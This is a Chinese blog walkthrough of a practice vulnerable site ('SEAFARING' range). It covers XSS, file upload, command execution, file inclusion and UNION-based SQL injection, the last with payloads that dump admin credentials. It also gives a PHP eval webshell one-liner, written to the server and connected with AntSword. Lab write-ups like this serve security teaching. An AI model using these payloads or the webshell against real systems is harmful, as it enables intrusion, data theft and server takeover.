当前位置: 首页 > news >正文

SEAFARING靶场漏洞攻略

寻找漏洞

一,我们打开页面

第一个漏洞

xss漏洞

1.在登录页面显示有弹窗

第二个漏洞

sql注入漏洞

1.在输入框的地方输入-1 union select 1,2,3#我们来查看他的回显点

2.查看数据库表名

-1 union select 1,database(),3#

3.查看表名

-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test'#

4.查看admin中的列名

-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='test' and table_name='admin'#

5.查看账号密码

-1 union select 1,2,group_concat(user_id,user_name,user_pass) from admin#

6.成功登录进来

第三个漏洞

文件上传漏洞

1.我们登录进去往下滑有个上传文件我们上传一个1.php

<?php @eval($_POST['cmd']);?>

2.用蚁剑连接一下

第四个漏洞

命令执行漏洞

1.页面下方有一个执行框,输入ls查看

2.输入echo '<?php phpinfo();?>' > wff.php 访问wff.php

3.写入一句话木马,访问1.php

echo '<?php @eval($_POST['cmd']);?>' > 1.php

4.蚁剑连接

第五个漏洞

文件包含漏洞

1.在关于页面中发现存在文件包含漏洞

2.通过访问之前写入的wff.php查看,远程文件包含关闭,本地文件可以访问

3.访问1.php

4.蚁剑连接

http://www.dtcms.com/a/12689.html

相关文章:

  • Playwright与Selenium的对比:谁是更适合你的自动化测试工具?
  • 随想录笔记-二叉树练习题
  • 基于微信小程序的宠物之家的设计与实现
  • 基于R语言的统计分析基础:使用SQL语句操作数据集
  • Gitlab实现多项目触发式自动CICD
  • 2024年华为9月4日秋招笔试真题题解
  • 多态(下)【C++】
  • HarmonyOS开发之模拟器地图点击无效问题
  • 实现实时Web应用,使用AJAX轮询、WebSocket、还是SSE呢??
  • Java | Leetcode Java题解之第405题数字转换为十六进制数
  • python-素数对
  • C Primer Plus 第5章习题
  • TDengine 与飞腾腾锐 D2000 完成兼容互认证,推动国产软硬件深度融合
  • MS SQL Server 实战 排查多列之间的值是否重复
  • 【字幕】恋上数据结构与算法之014动态数组02接口设计
  • C# 在WPF中实现图表生成
  • Python-pptx:如何在幻灯片中轻松插入与填充表格
  • 【算法】滑动窗口—字符串的排列
  • QT多线程编程(基础概念以及示例)
  • 什么是CPU、GPU、NPU?(包懂+会)
  • 存储课程学习笔记5_iouring的练习(io_uring,rust_echo_bench,fio)
  • Docker上安装mysql
  • PXE服务
  • 【研赛论文】数学建模2024华为杯论文word/latex模板
  • DAY60Bellman_ford 算法
  • 关于C# 数据库访问 转为 C++ CLI 数据库访问
  • 身份实名认证-身份证实名认证-身份证实名-实名认证-身份证二要素-身份证实名认证-身份实名认证-身份证号码实名认证核验校验接口API
  • 人工智能与机器学习原理精解【19】
  • Spring4-IoC2-基于注解管理bean
  • 二次规划及其MATLAB实现